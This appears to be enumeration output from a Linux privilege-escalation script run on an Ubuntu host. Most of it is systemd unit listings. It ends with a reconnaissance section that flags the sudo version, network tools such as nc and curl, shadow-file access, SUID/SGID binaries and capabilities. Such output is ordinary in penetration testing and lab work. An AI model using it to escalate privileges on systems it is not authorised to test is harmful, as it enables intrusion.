-rw-r--r-- 1 root root  492 Apr  1  2020 rescue.target
-rw-r--r-- 1 root root  540 Apr  1  2020 rpcbind.target
-rw-r--r-- 1 root root  442 Apr  1  2020 shutdown.target
-rw-r--r-- 1 root root  402 Apr  1  2020 sigpwr.target
-rw-r--r-- 1 root root  460 Apr  1  2020 sleep.target
-rw-r--r-- 1 root root  449 Apr  1  2020 slices.target
-rw-r--r-- 1 root root  420 Apr  1  2020 smartcard.target
-rw-r--r-- 1 root root  396 Apr  1  2020 sockets.target
-rw-r--r-- 1 root root  420 Apr  1  2020 sound.target
-rw-r--r-- 1 root root  577 Apr  1  2020 suspend-then-hibernate.target
-rw-r--r-- 1 root root  503 Apr  1  2020 suspend.target
-rw-r--r-- 1 root root  393 Apr  1  2020 swap.target
-rw-r--r-- 1 root root  823 Apr  1  2020 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  738 Apr  1  2020 sys-kernel-debug.mount
-rw-r--r-- 1 root root  764 Apr  1  2020 sys-kernel-tracing.mount
-rw-r--r-- 1 root root  558 Apr  1  2020 sysinit.target
-rw-r--r-- 1 root root 1.4K Apr  1  2020 syslog.socket
-rw-r--r-- 1 root root  434 Apr  1  2020 system-systemd-cryptsetup.slice
-rw-r--r-- 1 root root 1.4K Apr  1  2020 system-update-cleanup.service
-rw-r--r-- 1 root root  543 Apr  1  2020 system-update-pre.target
-rw-r--r-- 1 root root  617 Apr  1  2020 system-update.target
-rw-r--r-- 1 root root  722 Apr  1  2020 systemd-ask-password-console.path
-rw-r--r-- 1 root root  737 Apr  1  2020 systemd-ask-password-console.service
-rw-r--r-- 1 root root  650 Apr  1  2020 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  742 Apr  1  2020 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 1.4K Apr  1  2020 systemd-boot-system-token.service
-rw-r--r-- 1 root root  556 Apr  1  2020 systemd-exit.service
-rw-r--r-- 1 root root  579 Apr  1  2020 systemd-halt.service
-rw-r--r-- 1 root root  546 Apr  1  2020 systemd-initctl.socket
-rw-r--r-- 1 root root  773 Apr  1  2020 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.2K Apr  1  2020 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  597 Apr  1  2020 systemd-journald-varlink@.socket
-rw-r--r-- 1 root root  882 Apr  1  2020 systemd-journald.socket
-rw-r--r-- 1 root root  738 Apr  1  2020 systemd-journald@.socket
-rw-r--r-- 1 root root  592 Apr  1  2020 systemd-kexec.service
-rw-r--r-- 1 root root  728 Apr  1  2020 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  633 Apr  1  2020 systemd-networkd.socket
-rw-r--r-- 1 root root  556 Apr  1  2020 systemd-poweroff.service
-rw-r--r-- 1 root root  551 Apr  1  2020 systemd-reboot.service
-rw-r--r-- 1 root root  726 Apr  1  2020 systemd-rfkill.socket
-rw-r--r-- 1 root root  695 Apr  1  2020 systemd-sysusers.service
-rw-r--r-- 1 root root  658 Apr  1  2020 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  490 Apr  1  2020 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  739 Apr  1  2020 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  779 Apr  1  2020 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  852 Apr  1  2020 systemd-udev-settle.service
-rw-r--r-- 1 root root  753 Apr  1  2020 systemd-udev-trigger.service
-rw-r--r-- 1 root root  635 Apr  1  2020 systemd-udevd-control.socket
-rw-r--r-- 1 root root  610 Apr  1  2020 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  426 Apr  1  2020 time-set.target
-rw-r--r-- 1 root root  479 Apr  1  2020 time-sync.target
-rw-r--r-- 1 root root  445 Apr  1  2020 timers.target
-rw-r--r-- 1 root root  457 Apr  1  2020 umount.target
-rw-r--r-- 1 root root  432 Apr  1  2020 user.slice
-rw-r--r-- 1 root root  498 Apr  1  2020 lxd-agent.service
-rw-r--r-- 1 root root  489 Apr  1  2020 lxd-agent-9p.service
-rw-r--r-- 1 root root  155 Mar 27  2020 phpsessionclean.service
-rw-r--r-- 1 root root  144 Mar 27  2020 phpsessionclean.timer
-rw-r--r-- 1 root root  561 Mar  3  2020 xfs_scrub@.service
-rw-r--r-- 1 root root  376 Mar  3  2020 xfs_scrub_all.service
-rw-r--r-- 1 root root  250 Mar  3  2020 xfs_scrub_all.timer
-rw-r--r-- 1 root root  272 Mar  3  2020 xfs_scrub_fail@.service
-rw-r--r-- 1 root root  482 Feb 25  2020 man-db.service
-rw-r--r-- 1 root root  164 Feb 25  2020 man-db.timer
-rw-r--r-- 1 root root 1.4K Feb 18  2020 auditd.service
-rw-r--r-- 1 root root  400 Feb 13  2020 blk-availability.service
-rw-r--r-- 1 root root  341 Feb 13  2020 dm-event.service
-rw-r--r-- 1 root root  248 Feb 13  2020 dm-event.socket
-rw-r--r-- 1 root root  323 Feb 13  2020 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  239 Feb 13  2020 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root  602 Feb 13  2020 lvm2-monitor.service
-rw-r--r-- 1 root root  338 Feb 13  2020 lvm2-pvscan@.service
lrwxrwxrwx 1 root root    9 Feb 13  2020 lvm2.service -> /dev/null
-rw-r--r-- 1 root root  454 Feb 13  2020 irqbalance.service
-rw-r--r-- 1 root root  358 Feb 11  2020 dmesg.service
-rw-r--r-- 1 root root  316 Feb 11  2020 cron.service
-rw-r--r-- 1 root root  222 Feb 10  2020 usb_modeswitch@.service
-rw-r--r-- 1 root root  997 Dec 10  2019 upower.service
-rw-r--r-- 1 root root  212 Dec  4  2019 apport-autoreport.path
-rw-r--r-- 1 root root  242 Dec  4  2019 apport-autoreport.service
-rw-r--r-- 1 root root  246 Dec  4  2019 apport-forward.socket
-rw-r--r-- 1 root root  142 Dec  4  2019 apport-forward@.service
-rw-r--r-- 1 root root  171 Nov 30  2019 usbmuxd.service
-rw-r--r-- 1 root root  312 Nov 27  2019 console-setup.service
-rw-r--r-- 1 root root  287 Nov 27  2019 keyboard-setup.service
-rw-r--r-- 1 root root  330 Nov 27  2019 setvtrgb.service
-rw-r--r-- 1 root root  175 Aug 11  2019 polkit.service
-rw-r--r-- 1 root root  604 Jul  8  2019 secureboot-db.service
-rw-r--r-- 1 root root 1013 Feb  4  2019 nginx.service
-rw-r--r-- 1 root root  626 Jan 29  2019 ifup@.service
-rw-r--r-- 1 root root  442 Jan 29  2019 ifupdown-pre.service
-rw-r--r-- 1 root root  279 Jan 29  2019 ifupdown-wait-online.service
-rw-r--r-- 1 root root  643 Jan 29  2019 networking.service
-rw-r--r-- 1 root root  695 Jan 21  2019 logrotate.service
-rw-r--r-- 1 root root  347 Nov 12  2018 atd.service
-rw-r--r-- 1 root root  618 Oct  2  2018 friendly-recovery.service
-rw-r--r-- 1 root root  172 Oct  2  2018 friendly-recovery.target
-rw-r--r-- 1 root root  192 Jan  4  2018 logrotate.timer

/lib/systemd/system/sound.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 14  2021 alsa-restore.service -> ../alsa-restore.service
lrwxrwxrwx 1 root root 21 Apr 14  2021 alsa-state.service -> ../alsa-state.service

/lib/systemd/system/system-update.target.wants:
total 0
lrwxrwxrwx 1 root root 31 May 11  2023 fwupd-offline-update.service -> ../fwupd-offline-update.service
lrwxrwxrwx 1 root root 36 Sep 23  2020 packagekit-offline-update.service -> ../packagekit-offline-update.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Mar 27  2023 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 27  2023 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Mar 27  2023 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Mar 27  2023 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Mar 27  2023 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Mar 27  2023 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Mar 27  2023 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Oct 25  2022 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 Nov  2  2020 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Nov  2  2020 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 27  2023 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Mar 27  2023 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Mar 27  2023 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Mar 27  2023 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Mar 27  2023 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Mar 27  2023 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Mar 27  2023 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Oct 25  2022 dbus.socket -> ../dbus.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Mar 27  2023 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Mar 27  2023 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Mar 27  2023 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Mar 27  2023 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Mar 27  2023 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Mar 27  2023 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Mar 27  2023 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Mar 27  2023 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 27 Mar 27  2023 sys-kernel-tracing.mount -> ../sys-kernel-tracing.mount
lrwxrwxrwx 1 root root 36 Mar 27  2023 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Mar 27  2023 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 36 Mar 27  2023 systemd-boot-system-token.service -> ../systemd-boot-system-token.service
lrwxrwxrwx 1 root root 30 Mar 27  2023 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Mar 27  2023 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Mar 27  2023 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Mar 27  2023 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Mar 27  2023 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Mar 27  2023 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Mar 27  2023 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 27 Mar 27  2023 systemd-sysusers.service -> ../systemd-sysusers.service
lrwxrwxrwx 1 root root 37 Mar 27  2023 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Mar 27  2023 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Mar 27  2023 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Mar 27  2023 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Mar 27  2023 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Nov  2  2020 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Nov  2  2020 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Mar 27  2023 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/user-.slice.d:
total 4.0K
-rw-r--r-- 1 root root 486 Apr  1  2020 10-defaults.conf

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r--r-- 1 root root 125 Feb 16  2022 timeout.conf

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Feb 16  2022 debian.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Nov  2  2020 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Nov  2  2020 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Nov  2  2020 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Nov  2  2020 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Nov  2  2020 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Nov  2  2020 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/local-fs.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-shutdown:
total 8.0K
-rwxr-xr-x 1 root root 252 May 11  2023 fwupd.shutdown
-rwxr-xr-x 1 root root 160 Sep 28  2020 mdadm.shutdown

/lib/systemd/user:
total 128K
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 graphical-session-pre.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 sockets.target.wants
-rw-r--r-- 1 root root  287 Apr  3  2023 ssh-agent.service
-rw-r--r-- 1 root root  546 Mar 27  2023 graphical-session-pre.target
-rw-r--r-- 1 root root  360 Oct 25  2022 dbus.service
-rw-r--r-- 1 root root  174 Oct 25  2022 dbus.socket
-rw-r--r-- 1 root root  231 Jul  4  2022 dirmngr.service
-rw-r--r-- 1 root root  165 Sep 23  2020 pk-debconf-helper.service
-rw-r--r-- 1 root root  127 Sep 23  2020 pk-debconf-helper.socket
-rw-r--r-- 1 root root  147 Jun 23  2020 glib-pacrunner.service
-rw-r--r-- 1 root root  497 Apr  1  2020 basic.target
-rw-r--r-- 1 root root  419 Apr  1  2020 bluetooth.target
-rw-r--r-- 1 root root  463 Apr  1  2020 default.target
-rw-r--r-- 1 root root  502 Apr  1  2020 exit.target
-rw-r--r-- 1 root root  484 Apr  1  2020 graphical-session.target
-rw-r--r-- 1 root root  394 Apr  1  2020 paths.target
-rw-r--r-- 1 root root  417 Apr  1  2020 printer.target
-rw-r--r-- 1 root root  442 Apr  1  2020 shutdown.target
-rw-r--r-- 1 root root  420 Apr  1  2020 smartcard.target
-rw-r--r-- 1 root root  396 Apr  1  2020 sockets.target
-rw-r--r-- 1 root root  420 Apr  1  2020 sound.target
-rw-r--r-- 1 root root  500 Apr  1  2020 systemd-exit.service
-rw-r--r-- 1 root root  657 Apr  1  2020 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  533 Apr  1  2020 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  720 Apr  1  2020 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  445 Apr  1  2020 timers.target
-rw-r--r-- 1 root root  204 Aug 28  2017 dirmngr.socket
-rw-r--r-- 1 root root  298 Aug 28  2017 gpg-agent-browser.socket
-rw-r--r-- 1 root root  281 Aug 28  2017 gpg-agent-extra.socket
-rw-r--r-- 1 root root  308 Aug 28  2017 gpg-agent-ssh.socket
-rw-r--r-- 1 root root  223 Aug 28  2017 gpg-agent.service
-rw-r--r-- 1 root root  234 Aug 28  2017 gpg-agent.socket

/lib/systemd/user/graphical-session-pre.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Aug  4 22:02 ssh-agent.service -> ../ssh-agent.service

/lib/systemd/user/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Oct 25  2022 dbus.socket -> ../dbus.socket

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 1.5K Apr  1  2020 90-systemd.preset

/lib/systemd/catalog:
total 160K
-rw-r--r-- 1 root root  13K Mar 27  2023 systemd.be.catalog
-rw-r--r-- 1 root root 9.8K Mar 27  2023 systemd.be@latin.catalog
-rw-r--r-- 1 root root  14K Mar 27  2023 systemd.bg.catalog
-rw-r--r-- 1 root root  15K Mar 27  2023 systemd.catalog
-rw-r--r-- 1 root root  471 Mar 27  2023 systemd.de.catalog
-rw-r--r-- 1 root root  13K Mar 27  2023 systemd.fr.catalog
-rw-r--r-- 1 root root  16K Mar 27  2023 systemd.it.catalog
-rw-r--r-- 1 root root  15K Mar 27  2023 systemd.pl.catalog
-rw-r--r-- 1 root root 8.1K Mar 27  2023 systemd.pt_BR.catalog
-rw-r--r-- 1 root root  20K Mar 27  2023 systemd.ru.catalog
-rw-r--r-- 1 root root 7.1K Mar 27  2023 systemd.zh_CN.catalog
-rw-r--r-- 1 root root 7.1K Mar 27  2023 systemd.zh_TW.catalog

/lib/systemd/user-environment-generators:
total 20K
-rwxr-xr-x 1 root root 15K Mar 27  2023 30-systemd-environment-d-generator
-rw-r--r-- 1 root root 851 Jan  6  2021 90gpg-agent

/lib/systemd/user-preset:
total 4.0K
-rw-r--r-- 1 root root 744 Apr  1  2020 90-systemd.preset

/lib/systemd/system-generators:
total 436K
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-bless-boot-generator
-rwxr-xr-x 1 root root  35K Mar 27  2023 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-debug-generator
-rwxr-xr-x 1 root root  39K Mar 27  2023 systemd-fstab-generator
-rwxr-xr-x 1 root root  19K Mar 27  2023 systemd-getty-generator
-rwxr-xr-x 1 root root  35K Mar 27  2023 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-rc-local-generator
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-run-generator
-rwxr-xr-x 1 root root  15K Mar 27  2023 systemd-system-update-generator
-rwxr-xr-x 1 root root  35K Mar 27  2023 systemd-sysv-generator
-rwxr-xr-x 1 root root  19K Mar 27  2023 systemd-veritysetup-generator
-rwxr-xr-x 1 root root 148K Feb 13  2020 lvm2-activation-generator
-rwxr-xr-x 1 root root  286 Jun 21  2019 friendly-recovery

/lib/systemd/network:
total 32K
-rw-r--r-- 1 root root  44 Feb 15  2023 73-usb-net-by-mac.link
-rw-r--r-- 1 root root 645 Apr  1  2020 80-container-host0.network
-rw-r--r-- 1 root root 718 Apr  1  2020 80-container-ve.network
-rw-r--r-- 1 root root 704 Apr  1  2020 80-container-vz.network
-rw-r--r-- 1 root root  78 Apr  1  2020 80-wifi-adhoc.network
-rw-r--r-- 1 root root 101 Apr  1  2020 80-wifi-ap.network.example
-rw-r--r-- 1 root root  64 Apr  1  2020 80-wifi-station.network.example
-rw-r--r-- 1 root root 491 Apr  1  2020 99-default.link

/lib/systemd/ntp-units.d:
total 4.0K
-rw-r--r-- 1 root root 26 Apr  1  2020 80-systemd-timesync.list

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Aug 21  2019 hdparm

/lib/systemd/boot:
total 4.0K
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 efi

/lib/systemd/boot/efi:
total 148K
-rwxr-xr-x 1 root root 55K Mar 27  2023 linuxx64.efi.stub
-rwxr-xr-x 1 root root 90K Mar 27  2023 systemd-bootx64.efi

/lib/systemd/user-generators:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.31


[-] MYSQL version:
mysql  Ver 8.0.35-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))


### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 2001 Oct 26 15:01 /etc/passwd
-rw-r--r-- 1 root root 815 Oct 26 15:01 /etc/group
-rw-r--r-- 1 root root 581 Dec  5  2019 /etc/profile
-rw-r----- 1 root shadow 1241 Oct 26 15:01 /etc/shadow


[-] SUID files:
-rwsr-xr-- 1 root messagebus 51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 473576 Aug  4 22:02 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55528 May 30  2023 /usr/bin/mount
-rwsr-xr-x 1 root root 166056 Apr  4  2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 88464 Nov 29  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 May 30  2023 /usr/bin/umount
-rwsr-xr-x 1 root root 68208 Nov 29  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Nov 29  2022 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
-rwsr-xr-x 1 root root 85064 Nov 29  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 44784 Nov 29  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 67816 May 30  2023 /usr/bin/su


[-] SGID files:
-rwxr-sr-x 1 root shadow 43168 Feb  2  2023 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43160 Feb  2  2023 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 14648 Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 35048 May 30  2023 /usr/bin/wall
-rwxr-sr-x 1 root ssh 350504 Aug  4 22:02 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 14488 Aug 26  2019 /usr/bin/mlock
-rwxr-sr-x 1 root shadow 31312 Nov 29  2022 /usr/bin/expiry
-rwxr-sr-x 1 root tty 14488 Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 84512 Nov 29  2022 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
-rwxr-sr-x 1 root crontab 43720 Feb 13  2020 /usr/bin/crontab


[+] Files with POSIX capabilities set:
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 34 Apr 14  2020 /etc/ld.so.conf
-rw-r--r-- 1 root root 1523 Feb 10  2020 /etc/usb_modeswitch.conf
-rw-r--r-- 1 root root 92 Dec  5  2019 /etc/host.conf
-rw-r--r-- 1 root root 138 Feb 14  2020 /etc/sos.conf
-rw-r--r-- 1 root root 685 Feb 14  2020 /etc/e2scrub.conf
-rw-r--r-- 1 root root 5060 Aug 21  2019 /etc/hdparm.conf
-rw-r--r-- 1 root root 604 Sep 15  2018 /etc/deluser.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 3028 Apr 23  2020 /etc/adduser.conf
-rw-r--r-- 1 root root 7545 Sep 12 17:32 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 510 Apr 23  2020 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2351 Feb 13  2020 /etc/sysctl.conf
-rw-r--r-- 1 root root 1382 Feb 11  2020 /etc/rsyslog.conf
-rw-r--r-- 1 root root 808 Feb 14  2020 /etc/mke2fs.conf
-rw-r--r-- 1 root root 533 Jan 21  2019 /etc/logrotate.conf
-rw-r--r-- 1 root root 350 Apr 23  2020 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 14867 Feb  1  2019 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb  1  2020 /etc/gai.conf
-rw-r--r-- 1 root root 552 Dec 17  2019 /etc/pam.conf
-rw-r--r-- 1 root root 41 Apr  6  2020 /etc/multipath.conf
-rw-r--r-- 1 root root 642 Sep 24  2019 /etc/xattr.conf
-rw-r--r-- 1 root root 1260 Dec 14  2018 /etc/ucf.conf
-rw-r--r-- 1 root root 2969 Aug  3  2019 /etc/debconf.conf
-rw-r--r-- 1 root root 191 Feb 18  2020 /etc/libaudit.conf
-rw-r--r-- 1 root root 6920 Feb 25  2020 /etc/overlayroot.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/logan/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Jan 20  2021 .
drwxr-xr-x 13 root root 4096 Sep 12 17:36 ..


### SCAN COMPLETE ####################################